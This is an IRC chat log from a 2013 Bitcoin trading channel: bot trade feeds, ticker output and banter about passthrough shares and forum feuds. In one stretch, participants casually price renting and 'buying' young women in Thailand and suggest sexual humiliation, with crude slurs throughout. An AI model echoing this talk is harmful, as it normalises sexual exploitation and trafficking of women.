drunken street whore. May 01 02:49:42 top that, tortilla! May 01 02:49:45 [MPEX] [S.MPOE] 6800 @ 0.00071681 = 4.8743 BTC [-] May 01 02:52:32 [MPEX] [S.MPOE] 1234 @ 0.00072819 = 0.8986 BTC [+] May 01 02:52:33 [MPEX] [S.MPOE] 1049 @ 0.00073864 = 0.7748 BTC [+] May 01 02:52:36 [MPEX] [S.MPOE] 36 @ 0.00073864 = 0.0266 BTC [+] May 01 02:57:07 [HAVELOCK] [SDICE] 1 @ 0.32100003 BTC [-] May 01 03:00:42 hm May 01 03:01:07 can someone double check my maff May 01 03:04:39 [BTCTC] [ASICMINER-PT] 2 @ 1.21047 = 2.4209 BTC [-] May 01 03:08:48 [BTCTC] [BTC-BOND] 4 @ 0.0101 = 0.0404 BTC [+] May 01 03:16:58 [BTCTC] [ASICMINER-PT] 1 @ 1.222223 BTC [+] May 01 03:19:09 sure kakobrekla May 01 03:19:33 [BTCTC] [COGNITIVE] 4 @ 0.21 = 0.84 BTC [+] May 01 03:21:33 [BTCTC] [BTC-BOND] 55 @ 0.0101 = 0.5555 BTC [+] May 01 03:23:05 mircea_popescu: https://bitcointalk.org/index.php?topic=174620.msg1990212#msg1990212 May 01 03:23:10 wont stand long prolly May 01 03:23:37 1 desertspoon of bitcoins May 01 03:23:39 lmao May 01 03:24:16 ajaja ok tyhis is pretty good. May 01 03:25:30 o May 01 03:25:32 i just noticed May 01 03:25:42 the double cherry truck... its over 9000. May 01 03:28:17 btw the dept of corrections is saying you need to spell dessertspoon May 01 03:28:24 otherwise spoon of sand May 01 03:28:37 ok fixd May 01 03:32:44 also added May 01 03:32:44 1 piggy bank of bitcoins = 44375040 satoshi = 443.7504 mBTC = 0.4437504 BTC May 01 03:32:50 sounds about right May 01 03:33:26 lol May 01 03:34:32 lets test it out...someone send me a bag of bitcoins. I'll send my address- May 01 03:34:39 I'll let you know if its right. May 01 03:37:33 [BTCTC] [ASICMINER-PT] 8 @ 1.222223 = 9.7778 BTC [+] May 01 03:39:45 [BTCTC] [GSDPT] 36 @ 0.00301 = 0.1084 BTC [-] May 01 03:40:13 [BTCTC] [ASICMINER-PT] 1 @ 1.222223 BTC [+] May 01 03:40:25 [MPEX] [S.MPOE] 14 @ 0.00071799 = 0.0101 BTC [-] May 01 03:44:12 http://imgur.com/gallery/E0Nqj May 01 03:44:30 should i add 1 tux of bitcoin like hmm May 01 03:44:36 ;;calc 21*.7 May 01 03:44:36 14.7 May 01 03:44:42 14.7 mio? May 01 03:45:25 1 tux of bitcoin should be 3.14 satoshi May 01 03:45:45 :p May 01 03:45:46 the pissatoshi, the unit of rage. May 01 03:46:01 that sounds like someone's genitals in Italian. May 01 03:51:00 mircea_popescu: pissantoshi, a unit of measure for pissanthood. May 01 03:51:31 lmao shuddup May 01 03:51:45 i've just been pissanting the shit out of fred destin on twitter May 01 03:51:50 you've been watching haven't you. May 01 03:52:07 [HAVELOCK] [KCIM] 5 @ 1.4689 = 7.3445 BTC [+] May 01 03:52:23 mircea_popescu: nope. link? May 01 03:54:13 odd timig May 01 03:54:14 https://twitter.com/fdestin/status/329396168058613761 May 01 04:01:50 [BTCTC] [BTC-BOND] 925 @ 0.0101 = 9.3425 BTC [+] May 01 04:02:02 [BTCTC] [BTC-BOND] 454 @ 0.0101 = 4.5854 BTC [+] May 01 04:07:08 [HAVELOCK] [VTX] 1 @ 0.47939789 BTC [-] May 01 04:07:34 [BTCTC] [BTC-BOND] 10 @ 0.01015 = 0.1015 BTC [+] May 01 04:08:35 [BTCTC] [BTC-BOND] 550 @ 0.01018 = 5.599 BTC [+] May 01 04:09:50 [BTCTC] [BTC-BOND] 25 @ 0.01018 = 0.2545 BTC [+] May 01 04:10:23 heh http://www.youtube.com/watch?v=59uTUpO8Dzw May 01 04:14:52 tl;dr May 01 04:27:18 he makes sense also in relation to bitcoins May 01 04:33:09 that avatar of you on Twitter looks like Tom Hanks. May 01 04:35:26 [BTCTC] [ASICMINER-PT] 5 @ 1.223223 = 6.1161 BTC [+] May 01 04:37:44 anyone want to buy me a gift cert ? May 01 04:40:30 heh. May 01 04:43:47 ;;ticker May 01 04:43:48 BTCUSD ticker | Best bid: 139.20000, Best ask: 139.29995, Bid-ask spread: 0.09995, Last trade: 139.20000, 24 hour volume: 64271.06565196, 24 hour low: 134.00000, 24 hour high: 146.93000, 24 hour vwap: 139.70171 May 01 04:52:25 ;;rated petertodd May 01 04:52:25 You rated user petertodd on Sat Feb 9 03:36:12 2013, giving him a rating of 1, and supplied these additional notes: bought me SA gift cert.. May 01 04:52:38 ;;rate petertodd 2 the gift cert expert. May 01 04:52:39 Rating entry successful. Your rating for user petertodd has changed from 1 to 2. May 01 04:55:07 [HAVELOCK] [SDICE] 15 @ 0.32100002 = 4.815 BTC [-] May 01 04:55:09 [HAVELOCK] [SDICE] 152 @ 0.32 = 48.64 BTC [-] May 01 04:59:22 [MPEX] [S.MPOE] 9386 @ 0.00071799 = 6.7391 BTC [-] May 01 04:59:24 [MPEX] [S.MPOE] 11994 @ 0.00072741 = 8.7246 BTC [+] May 01 05:02:10 "Contacted a lawyer, will wait for his opinion about the brief to see whether it's worth it or not." May 01 05:02:12 lmao May 01 05:02:57 meh May 01 05:03:07 [HAVELOCK] [HIM] 2 @ 1.8501 = 3.7002 BTC [+] May 01 05:03:09 [HAVELOCK] [HIM] 5 @ 1.85 = 9.25 BTC [-] May 01 05:05:07 [HAVELOCK] [HIM] 3 @ 1.83 = 5.49 BTC [-] May 01 05:06:08 [HAVELOCK] [VTX] 9 @ 0.4625 = 4.1625 BTC [-] May 01 05:09:29 [BTCTC] [ASICMINER-PT] 1 @ 1.22322 BTC [-] May 01 05:17:08 [HAVELOCK] [HIM] 5 @ 1.8399 = 9.1995 BTC [+] May 01 05:18:08 [HAVELOCK] [VTX] 7 @ 0.47939789 = 3.3558 BTC [+] May 01 05:23:53 where the hell did you guys find that idiot anyway? you need to get RMA and ship him back May 01 05:31:12 Can someone explain to me what's the difference between Cryptostocks and Picostocks? I see that Picostocks allow you to do an IPO, while Cryptostocks simply store the stock into your account and then you just regularly sell them on the market. May 01 05:32:10 [MPEX] [S.MPOE] 1677 @ 0.0007343 = 1.2314 BTC [+] May 01 05:32:23 cryptostocks is an old stock exchange thing. never went anywhere. May 01 05:32:32 picostocks is pretty much a scam, a la bitbillions or w/e May 01 05:33:11 old stock exchange? what do you mean? It's an old site or is it old-style stock exchange? And what's old style? :-) May 01 05:33:23 it's old as in it existed for more than a year. May 01 05:33:56 I see. And what's w/e? May 01 05:33:59 whatever May 01 05:34:11 ah ok I though it was some other scam site. May 01 05:34:25 haha would be pretty cool. May 01 05:34:40 anyway, the story with picostocks is this dude came out of nowhere, claimed he's making an exchange May 01 05:34:44 [BTCTC] [ASICMINER-PT] 1 @ 1.222223 BTC [-] May 01 05:34:51 then claimed he's making a fund on his exchange, on ~1mn dollar worth of basics May 01 05:34:54 (at the time) May 01 05:35:10 then tom folded and the guy was like a ok, making a 1mn worth of some other fpga i think it was May 01 05:35:21 he had never bought the chips, he's just a puff artist. May 01 05:36:06 [MPEX] [S.BBET] 1100 @ 0.00175 = 1.925 BTC [-] May 01 05:42:25 a poofter May 01 05:43:35 lol. "you sir are a poofter!" May 01 05:44:07 #hah May 01 05:46:15 Vircurex is listed on cryptostocks? I guess that's the biggest company there. May 01 05:46:33 arent they one and the same ppl May 01 05:47:03 Tritonio vircurex and cryptostocks run by the same guy, kumala May 01 05:47:16 the offering was a little dubious, too. check the forum thread it's discussed there May 01 05:47:47 I see. The offering you mean the IPO or the contract terms in general? I'm looking for the thread.... May 01 05:52:05 Kumala said: "One more week till end of IPO. Still have quite a number of shares to be sold." May 01 05:52:29 IPO? I just saw that CryptoStocks doesn't offer IPOs. May 01 05:52:52 It just gives you the shares to sell them at whatever price you want, doesn't it?? May 01 05:53:27 i think so. May 01 06:08:23 [MPEX] [O.USD.P143T] 2 @ 0.51564507 = 1.0313 BTC [+] May 01 06:10:09 [HAVELOCK] [HIM] 1 @ 1.79 BTC [-] May 01 06:16:21 [BTCTC] [ASICMINER-PT] 1 @ 1.22222 BTC [-] May 01 06:19:16 [BTCTC] [S.DICE-PT] 300 @ 0.003625 = 1.0875 BTC [+] May 01 06:21:15 There are currently 138673.56 bitcoins demanded at or over 50.0 USD, worth 11692792.2784 USD in total. | Data vintage: 72.6958 seconds May 01 06:21:20 There are currently 89593.695 bitcoins offered at or under 200.0 USD, worth 14932027.1768 USD in total. | Data vintage: 77.9570 seconds May 01 06:23:05 WTB Asicminer shares in bulk, pm plz May 01 06:24:21 [BTCTC] [S.MPOE-PT] 150 @ 0.00069 = 0.1035 BTC [+] May 01 06:24:54 ;;getrating ThickAsThieves May 01 06:24:54 WARNING: Currently not authenticated. User thickasthieves, rated since Sat Mar 2 09:19:18 2013. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=thickasthieves May 01 06:27:09 [HAVELOCK] [VTX] 1 @ 0.47939789 BTC [+] May 01 06:35:09 ;;ticker May 01 06:35:09 BTCUSD ticker | Best bid: 129.31000, Best ask: 129.38670, Bid-ask spread: 0.07670, Last trade: 129.38670, 24 hour volume: 79350.57428952, 24 hour low: 127.53171, 24 hour high: 146.93000, 24 hour vwap: 138.01913 May 01 06:36:09 [BTCTC] [S.DICE-PT] 548 @ 0.00363 = 1.9892 BTC [+] May 01 06:38:04 ;;bc,stats May 01 06:38:07 Current Blocks: 233998 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1873 blocks | Next Difficulty In About: 1 week, 5 days, 9 hours, 41 minutes, and 43 seconds | Next Difficulty Estimate: 10484860.0635 | Estimated Percent Change: 4.05474 May 01 06:39:00 [BTCTC] [S.MPOE-PT] 15 @ 0.000695 = 0.0104 BTC [+] May 01 06:39:10 [BTCTC] [S.MPOE-PT] 87 @ 0.000695 = 0.0605 BTC [+] May 01 06:39:26 ;;bc,sex May 01 06:39:27 Error: "bc,sex" is not a valid command. May 01 06:39:31 poofter. May 01 06:41:42 [BTCTC] [S.DICE-PT] 141 @ 0.00363 = 0.5118 BTC [+] May 01 06:44:07 [MPEX] [S.MPOE] 5564 @ 0.00073864 = 4.1098 BTC [+] May 01 06:44:09 [MPEX] [S.MPOE] 1986 @ 0.00073864 = 1.4669 BTC [+] May 01 06:44:27 im off May 01 06:44:28 nite May 01 06:49:47 [BTCTC] [ASICMINER-PT] 1 @ 1.20602 BTC [-] May 01 06:52:10 [HAVELOCK] [KCIM] 1 @ 1.469 BTC [+] May 01 06:52:14 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [+] May 01 06:52:22 [BTCTC] [ASICMINER-PT] 1 @ 1.222 BTC [+] May 01 06:52:27 [BTCTC] [ASICMINER-PT] 1 @ 1.2222 BTC [+] May 01 06:52:31 [BTCTC] [ASICMINER-PT] 1 @ 1.22222 BTC [+] May 01 06:52:43 [BTCTC] [ASICMINER-PT] 1 @ 1.222222 BTC [+] May 01 06:58:53 [BTCTC] [S.DICE-PT] 157 @ 0.00363 = 0.5699 BTC [+] May 01 07:01:22 hm May 01 07:01:32 price action looking kinda strange and choppy May 01 07:02:01 there's a storm a'brewin May 01 07:02:53 yea, still some way to go downwards imo May 01 07:04:29 or wait, we're prolly still in that big range 120-140 May 01 07:05:34 eh what the hell do i know May 01 07:16:10 [MPEX] [S.MPOE] 3400 @ 0.00071681 = 2.4372 BTC [-] May 01 07:16:16 [MPEX] [S.MPOE] 4341 @ 0.00071564 = 3.1066 BTC [-] May 01 07:43:54 [BTCTC] [ASICMINER-PT] 2 @ 1.228 = 2.456 BTC [+] May 01 07:49:58 [MPEX] [S.MPOE] 5909 @ 0.00071564 = 4.2287 BTC [-] May 01 07:49:59 [MPEX] [S.MPOE] 2400 @ 0.00071352 = 1.7124 BTC [-] May 01 07:50:00 [MPEX] [S.MPOE] 2399 @ 0.00070768 = 1.6977 BTC [-] May 01 07:50:05 [MPEX] [S.MPOE] 7692 @ 0.00070511 = 5.4237 BTC [-] May 01 07:53:00 ;;ticker May 01 07:53:01 BTCUSD ticker | Best bid: 134.40000, Best ask: 134.50000, Bid-ask spread: 0.10000, Last trade: 134.51999, 24 hour volume: 85736.85762934, 24 hour low: 127.30000, 24 hour high: 146.93000, 24 hour vwap: 137.23806 May 01 07:56:58 [BTCTC] [ASICMINER-PT] 1 @ 1.228 BTC [+] May 01 08:06:44 mircea_popescu: From the bitbet FAQ: How are winnings calculated? Every bet has two sides. Every bettor on the winning side will receive as follows : 99% of his original bet sum (1% goes to BitBet.us) plus 99% of his bet times the total bet by the losing side multiplied by the winning side total weight and divided by his bet's total weight. May 01 08:06:56 yes ? May 01 08:07:00 I think that's wrong. May 01 08:07:27 Every bettor on the winning side will receive as follows : 99% of his original bet sum (1% goes to BitBet.us) plus 99% of his bet times the total bet by the losing side multiplied by his bet's total weight and divided by the winning side total weight. May 01 08:07:33 Should be the correct thing no? May 01 08:07:39 yes. May 01 08:07:49 kakobrekla was going to fix it last time someone pointed this out May 01 08:07:57 Ah May 01 08:08:01 ty tho May 01 08:08:06 np May 01 08:08:46 I thought your formula was similar to BoB's but yours is totally decided by weight, not by whether you're on the winning side (they do a 50-50 thing). I kinda prefer yours I guess; it discourages late bettors even more. May 01 08:17:11 yeah May 01 08:19:24 I also like that you resolve your bets promptly; always seem to wait ages for BoB. :) May 01 08:19:54 people do complain but most are actually handled within hours. May 01 08:29:14 [BTCTC] [COGNITIVE] 1 @ 0.219 BTC [+] May 01 08:29:54 [BTCTC] [COGNITIVE] 5 @ 0.22 = 1.1 BTC [+] May 01 08:42:14 [BTCTC] [GSDPT] 83 @ 0.003289 = 0.273 BTC [+] May 01 08:56:30 Top headline on DPRK radio news today: "International society admires Kim Jong Un as a man of iron will with a lot of guts." May 01 08:56:44 its true May 01 08:56:52 pissing off the US takes huge balls May 01 08:58:20 im pretty sure nobody admires a fat twerp who inherited daddy's fortune. May 01 08:58:56 well no May 01 08:59:00 obviously not May 01 08:59:07 Im talking about the iron will and lots of guts part May 01 08:59:50 lots of guts, as in he's a fatty May 01 09:00:28 i wouldnt call his actions brave May 01 09:01:10 brave? no May 01 09:01:18 crazy as fuck? yes May 01 09:01:31 crazy, maybe May 01 09:01:49 more likely its strategy May 01 09:02:16 his behavior isnt new **** BEGIN LOGGING AT Wed May 1 15:25:22 2013 May 01 15:25:23 [BTCTC] [ASICMINER-PT] 1 @ 1.275 BTC [+] May 01 15:25:58 ;;ticker May 01 15:25:59 BTCUSD ticker | Best bid: 132.10000, Best ask: 132.36000, Bid-ask spread: 0.26000, Last trade: 132.10000, 24 hour volume: 100278.05955454, 24 hour low: 127.19900, 24 hour high: 146.50000, 24 hour vwap: 135.48832 May 01 15:33:08 See you @ $110 http://blockchained.com/depth_mtgox_15d.png May 01 15:35:13 heh May 01 15:50:30 mornin May 01 15:50:52 can anyone play this May 01 15:50:53 http://www.nasdaq.com/video/unravelling-the-mysteries-of-bitcoin-517763955 May 01 15:51:24 ya May 01 15:51:33 can't watch tho, at work already May 01 15:51:37 what are they sayin May 01 15:51:38 a May 01 15:51:46 unavailable due to location May 01 15:51:55 same here May 01 15:52:06 nasdaq too cool for yurop May 01 15:52:07 being in somalia takes its toll May 01 15:53:32 can't use a proxy or vpn? May 01 15:55:16 kakobrekla is not that asdvanced May 01 15:55:21 that's like... camwhore technologies. May 01 15:55:42 :)) May 01 15:57:50 http://trilema.com/2013/i-am-the-best-customer-rep-in-the-world/ May 01 15:57:54 let it be entered into record. May 01 16:03:10 https://bitcointalk.org/index.php?topic=191472.msg1993270#msg1993270 May 01 16:03:18 maybe this guy is just high all the time? May 01 16:03:29 first time i see him talking about weed May 01 16:03:36 and mp yeah THB is thai baht May 01 16:04:16 he is calling for 1 millioin usd per btc by christmas May 01 16:04:19 what can i buy for 1000 thb ? May 01 16:04:21 he must be high May 01 16:04:36 mp 2 hours with a hot 18 year old girl May 01 16:04:49 thats tourist prices May 01 16:05:25 you can get tow girls for 2 hours for 1000 baht if you speak thai May 01 16:05:31 two* May 01 16:05:52 why do you ask? May 01 16:08:00 hmm just did the math, i could get two girls every day for 7.26 years with the money he is wiring me... May 01 16:08:04 however no blow... May 01 16:08:33 just curious May 01 16:08:40 and i dont buy girls, tbh. May 01 16:08:59 this is the rate for renting May 01 16:09:02 buying is much more May 01 16:10:43 i think the cheapest to buy is like $2,000 usd but start to go up if you want anything but the lowest class May 01 16:11:00 some girls are in the millions of baht so like 100kusd plus May 01 16:12:19 ;;bc,convert thb May 01 16:12:20 1 BTC = 131.43204 U.S. dollars = 3 845.74087 Thai baht May 01 16:12:33 wtf May 01 16:12:40 that is right May 01 16:12:51 1 btc = 3.845 girls for an hour? May 01 16:12:56 2 hours May 01 16:13:01 yeah May 01 16:13:01 so May 01 16:13:11 ;;calc 3.845*2 May 01 16:13:12 7.69 May 01 16:13:20 keep in mind the average wage here for a month is just over $200 May 01 16:13:20 7.69 of a girl for an hour May 01 16:13:28 ill take 20 May 01 16:13:40 kako if you did you would not be the first May 01 16:13:51 id imagine May 01 16:14:12 but its hard to find 20 hot 18 year olds in one spot willing May 01 16:14:25 if you can go 18 to 24 or so yopu are going to be golden May 01 16:14:45 lolk May 01 16:15:02 hot girls realize they can make like $1000 a month sleeping around so they do it. parents after 20 years only make $200 a month May 01 16:15:06 wages really suck here May 01 16:15:11 i doubt ill ever go for that really, but hey it doesnt hurt to know the prices May 01 16:15:32 skilled westerners in demand only get about $1,000 usd a month here, unless they are in some super needed speical feild May 01 16:15:45 lol May 01 16:15:50 yes but food is cheap May 01 16:15:53 rent is cheap May 01 16:16:01 girl are cheap May 01 16:16:02 thats not why i went. yeah rent, and food is fuck all May 01 16:16:07 everything is cheap May 01 16:16:08 boze same May 01 16:16:17 Chaang-Noi> keep in mind the average wage here for a month is just over $200 << romania is about the same. May 01 16:16:28 of course girls here are tall, with big tits and normal eyes. May 01 16:16:32 uh that low? May 01 16:16:36 everything but luxary cars and high end electronics is cheap here May 01 16:16:36 yeah. May 01 16:16:47 kakobrekla minimum wage is actually 120 usd. May 01 16:16:50 mp what is the going rate for 2 hours wiht an 18 year old there? May 01 16:16:55 a coin. May 01 16:16:58 i have literally no idea, i've never paid. May 01 16:17:08 probably a fiddy bux i guess May 01 16:17:17 1000 baht is about 20 buck May 01 16:17:20 sorry 30 May 01 16:17:35 ya well, tell you what, if i were to pay i don't think i'd ask for change. May 01 16:17:36 seems about right i guess May 01 16:18:29 if you speak thai there is no need to pay, and im assuming the same for romania May 01 16:18:50 however i doubt a thai guy in romaina would get it for free with out a bit of luck May 01 16:18:56 in my experience so far if you're not an idiot you don't need to pay. us or romania, mexico or egypt even May 01 16:19:15 yeah, but at times it is faster and just easyer to pay May 01 16:19:20 lol May 01 16:19:51 most guys would pay $30 not to have the date/foreplay and just do what they want May 01 16:20:01 but i enjoy talking with women May 01 16:20:02 time is money... May 01 16:20:06 oh May 01 16:20:08 well... May 01 16:20:32 then i guess that works for you. id rather not in most cases May 01 16:20:33 but they won't make you dinner and wash your clothes, which saves time May 01 16:20:34 who am i going to talk to, dudes ? May 01 16:20:53 dudes intellectually challenge you May 01 16:20:54 you talk to me May 01 16:20:55 half the time i'm thinking "why am i even talking to this guy, he doesn't even have tits" May 01 16:20:55 :/ May 01 16:21:05 only 0.1% of women do May 01 16:21:13 lol if im talking to a girl im like, why the fuck am i talking to her, she has tits... May 01 16:21:16 Scrat no they don't. once you are one with the inner woman dudes are too easy. May 01 16:21:18 hard to find May 01 16:21:41 Scrat super easy to find. you know why ? they tend to know each other. May 01 16:21:46 deadweasel wife is not same as renting a girl for a few hours. you can do both May 01 16:21:53 before you know it i's like "hey i have this friend i want you to meet" May 01 16:21:57 not wife May 01 16:22:26 well i have a wife and a maid, maid costs $200 a month, wife a bit more... May 01 16:22:29 she's my fucking ladyfriend May 01 16:23:17 Chaang-Noi don't you ever get bored ? May 01 16:23:40 im bored right now May 01 16:23:47 "just stay away from my fucking lady friend" May 01 16:24:13 Chaang-Noi how much do ladyboys go for May 01 16:24:24 i think the same or less May 01 16:24:24 mircea_popescu? May 01 16:24:38 hm ? May 01 16:24:40 isn't the proper nomenclature "ladyboi" May 01 16:25:02 in BTC May 01 16:25:48 [BTCTC] [ASICMINER-PT] 1 @ 1.23003 BTC [-] May 01 16:25:56 Does anyone know if any of the BFL units will play leet games like Crysis..I'm expecting mine soon and want to see what that sumbitch can do May 01 16:26:08 nope May 01 16:26:11 nothing but hash May 01 16:26:21 btw, rikur is in a tizzy May 01 16:26:36 Am is up to 10 th May 01 16:27:02 i doubt they will hit their goal of 15 th this week if they dont speed it up May 01 16:27:23 and technically, I do pay her. I rent out her basement, then a month lady started sleeping with her. now I pay my girlfriend rent! shit.. May 01 16:27:37 s/lady/later May 01 16:27:37 http://blogs.telegraph.co.uk/technology/willardfoxton2/100009112/the-online-drug-marketplace-silk-road-is-collapsing-did-hackers-government-or-bitcoin-kill-it/ love it when the media trollz May 01 16:27:37 ;;title https://bitcointalk.org/index.php?topic=192498.0 May 01 16:27:39 [ANNOUNCEMENT] [Bitfunder] TAT.ASICMINER New Micro-share Passthrough! May 01 16:27:51 well MP, maybe I need to get out more. or become a millionaire. or both May 01 16:27:59 ;;title https://bitcointalk.org/index.php?topic=192499.0 May 01 16:28:01 [ANNOUNCEMENT] [BTC-TC] TAT.ASICMINER New Micro-share Passthrough! May 01 16:28:06 Please show your support! May 01 16:28:23 and technically, I do pay her. I rent out her basement, then a month lady started sleeping with her. now I pay my girlfriend rent! shit.. <<< bwahahah May 01 16:28:26 you basement dweller you. May 01 16:28:40 :) May 01 16:28:46 anyway, this is ripe for humiliation games, next time you pay her rent give her a dollah and make her suck your cock for it. May 01 16:28:48 it's true :( May 01 16:29:09 Thick where is this being listed? May 01 16:29:10 she gives me more good sex than i can handle. she's a fucking animal. literally. May 01 16:29:14 ThickAsThieves o is that yours ? what's the idea ? May 01 16:29:19 yes May 01 16:29:27 it wil;l be listed on both BTCT and BF May 01 16:29:28 A “dead man’s switch” will be implemented in order to pass control of this asset to a safe secondary operator in the case of the issuer’s untimely demise or hospitalization. May 01 16:29:30 :D May 01 16:29:40 it's essentially 1/100 shares May 01 16:29:59 also another venue to obtain board seat benefits May 01 16:30:08 Scrat http://imgur.com/7SIRY0f May 01 16:30:10 (should they ever appear) May 01 16:30:37 nice May 01 16:30:40 ThickAsThieves so you bought how many shares ? on PTs or direct ? May 01 16:30:54 I've got about 500 or so May 01 16:31:03 and you split them up into 50k ? May 01 16:31:08 yes May 01 16:31:14 will use IPO to reinvest as needed May 01 16:31:18 so people can buy for 1 dollar. i get it May 01 16:31:27 a pt to the pts, because people refused to implement the mpex standard May 01 16:32:30 this probly wouldve happened even if AM did IPO on mpex May 01 16:32:34 well, the main pass thoughs or at least the one on btct is already talking about a 1/100 split in the price May 01 16:32:41 ThickAsThieves i just mean the small share price. May 01 16:32:41 i think they had a motion on it May 01 16:32:47 im pretty sure i voted yess on it May 01 16:32:55 yeah, May 01 16:32:57 as in make shares be 10k-100k satoshi sort of thing May 01 16:33:06 "This is because of the fact that I am cool, and most of you are not. If I spend bitcoins, the universe is busy giving them back to me." May 01 16:33:08 he posted his forum thread as I was formatting mine May 01 16:33:19 "coolness is a trait that one can develop. One of the ways to develop it, is to spend time with cool people, such as me." May 01 16:33:21 my BTCT app is submitted May 01 16:33:31 basically uppitty tortilla is offering friend services ? May 01 16:33:33 I spoke with Burnside about it beforehand May 01 16:33:35 that's overpriced. May 01 16:33:42 and he said go for it May 01 16:33:45 okay well im pretty srue i voted on the motion to do a split to 1/100 2 days ago but not 1005 sure May 01 16:33:55 okay May 01 16:34:01 yeah Burnside made no mention to me of this... May 01 16:34:34 http://www.theblaze.com/wp-content/uploads/2013/05/Screen-Shot-2013-05-01-at-8.25.46-AM-620x426.png May 01 16:34:37 I do think mine is better than ryan's ofc May 01 16:34:40 that dude got worked on in the venezuela parliament. May 01 16:34:43 apparently they had a row :D May 01 16:34:50 particularly since it will appear on both exxchanges May 01 16:34:58 making uptake better May 01 16:35:11 mine also doesn't have a bunch of silly games with mgmt fees May 01 16:35:30 mine does not allow import/export of shares May 01 16:35:35 I am sole manager May 01 16:35:38 etc May 01 16:36:11 i tried to make it different enough to, well, be different than the existing PTs May 01 16:36:35 ThickAsThieves cool. May 01 16:37:22 "To MP: May 01 16:37:22 I cannot understand why you continue to bully your inferiors and not speak kindly (as I do), towards all who want to understand. You only posted me a proof this week that you actually have a PR lady, until that I had thought you are a schizophrenic. Your PR is not doing a good job, if I were you I would think again how to present yourself to the world. I do not believe your business is worth 700,000,000mBTC and mine is May 01 16:37:22 only 400,000mBTC. As I speak the truth in kindness, and you don't, the valuation of your business will decline and mine will increase. You understand all this, so I await for a change in strategy or the continued decline of your importance." May 01 16:37:37 hum, where can i see my importance graph ? May 01 16:40:45 [BTCTC] [ASICMINER-PT] 1 @ 1.26489 BTC [+] May 01 16:42:07 mp you showed it to me May 01 16:42:23 its the the capitalazation of s.dice vs mpoe May 01 16:42:37 you remember that one? :) May 01 16:43:31 yeh May 01 16:43:37 atm im at the peak tho, May 01 16:43:41 !t m s.dice May 01 16:43:42 [MPEX:S.DICE] 1D: 0.00291 / 0.00292345 / 0.00319322 (7745 shares, 22.64 BTC), 7D: 0.00278789 / 0.00304025 / 0.00349938 (39765 shares, 120.90 BTC), 30D: 0.0012 / 0.00310069 / 0.00439999 (940382 shares, 2,915.83 BTC) May 01 16:43:44 !t m s.mpoe May 01 16:43:45 well there you go:) May 01 16:43:46 [MPEX:S.MPOE] 1D: 0.00069156 / 0.00071665 / 0.00073864 (408216 shares, 292.55 BTC), 7D: 0.00064 / 0.00070504 / 0.00076528 (2569174 shares, 1,811.39 BTC), 30D: 0.00059218 / 0.00069719 / 0.00076528 (10160766 shares, 7,084.08 BTC) May 01 16:43:49 like 2.x whatever May 01 16:45:18 who's letter was that, mp? May 01 16:45:51 the ever ebullient petrilla guy May 01 16:46:43 deadweasel or you mean the bitbet letter ? May 01 16:48:21 mp you seem to be a popular guy so far today May 01 16:48:40 mp is pretty popular for never posting on the forum May 01 16:48:47 i think its cuz most people think his pr guy is him May 01 16:48:56 or girl if she is one May 01 16:49:03 im reading what this guy is saying in #bitcoin-analysis May 01 16:49:22 did not even know that was a chan May 01 16:50:18 Yes, and there is also #bitcoin-anal which is also a lovely channel. May 01 16:50:45 lol, rikur and petriella are srsly butthurt May 01 16:51:51 Is it true mp wont accept any critics or feedback? May 01 16:51:51 aww whart nao. May 01 16:51:56 taub thestringpuller ThickAsThieves thoa_afk tk993 TomServo topace topace_ Transisto Tritonio troc Troic_ truffles Tykling May 01 16:51:59 KRS1 try it and see. May 01 16:52:01 I kind of thought he was a pretty amicable fellow. May 01 16:52:11 I'll have to come up with something. May 01 17:07:47 i hated mircea_popescu when i got here... I thought "what an arrogant twat". I still think that, but also I think you are correct most of the time.... your delivery is usually lacking grace, but you are generally correct. May 01 17:08:14 what, seriously ? May 01 17:08:18 i had no idea you hated me. May 01 17:08:20 when was this ? May 01 17:08:48 srsly :) the first few weeks I was here. May 01 17:09:15 but as I slowly discovered, your points were correct if ill-delivered. May 01 17:09:15 i want to smother the guy with a pillow in his sleep May 01 17:09:18 i guess i May 01 17:09:25 'm arrogantly twatty enough to not notice May 01 17:09:26 which is way more important in my mind, I have a thick skin May 01 17:09:33 or maybe you had the sense to stfu and lurk May 01 17:09:38 lol bithub, we've all felt that May 01 17:09:47 i tend not to react May 01 17:09:59 hehe so hostile May 01 17:09:59 and I tend to do exactly that May 01 17:10:08 good strategy. May 01 17:10:18 BitHub if you're a girl some pillow stuff may be arranged :D May 01 17:10:20 candor is an acquired taste May 01 17:10:32 not pillow biting :B May 01 17:10:37 but no worries, mp, I enjoy your sparky attitude these days, it necessary. May 01 17:10:53 deadweasel contrary to what they say, i don't mind criticism etc. May 01 17:10:54 don't do it, your bitcoi rep is on teh line May 01 17:10:56 actually... May 01 17:11:00 mp if you have not seen it https://bitcointalk.org/index.php?topic=174620.msg1994500#msg1994500 May 01 17:11:12 i know you don't mp May 01 17:11:34 i think mp knows exactly how some people will receive him, and does indeed of enough of a narcissistic bent to be okay with it May 01 17:11:34 Apr 15 15:45:21 nah unbalanced_ he likes criticism May 01 17:11:34 Apr 15 15:45:28 loves it May 01 17:11:40 this does not make him a bad person May 01 17:11:49 or someone to hate May 01 17:12:39 i don't, I quite enjoy mircea_popescu these days, i just had to get over my own ignorant butt hurt pride. it takes a minute or two... :) May 01 17:12:57 the thing that actually caught my attention most about mp wasnt the arrogance, that always comes with intelligent internet chatters, May 01 17:13:06 it's his paternal effect on the room May 01 17:13:18 mp is somehow our daddy May 01 17:13:25 when you come in here ignorant, and MP laws down the fucking law, and you don't like or don't agree, it's hard on the old self-importance gland. May 01 17:13:26 no homo? May 01 17:13:28 it's evident constantly May 01 17:13:30 no doubt ThickAsThieves May 01 17:13:35 no May 01 17:13:35 no homo May 01 17:13:39 no homo May 01 17:13:47 deadweasel some people are way better at coping than others. May 01 17:13:49 no homo May 01 17:13:51 to me it connotes intelligence. May 01 17:15:05 is mp old? May 01 17:15:08 maybe thats why May 01 17:15:14 im very old. May 01 17:15:25 like 55+? May 01 17:15:31 like almost 35 May 01 17:15:33 lol May 01 17:15:45 what. that's way old. all you 20something young cocks!!1 May 01 17:16:26 34 May 01 17:16:40 Chaang-Noi lol May 01 17:16:44 14/f May 01 17:17:09 http://ctrlq.org/files/screenshots/6a630eefd44705f3ead4d3e81658fa9b.png May 01 17:17:11 you an abo BitHub? May 01 17:17:13 here's a ss just in case. May 01 17:17:23 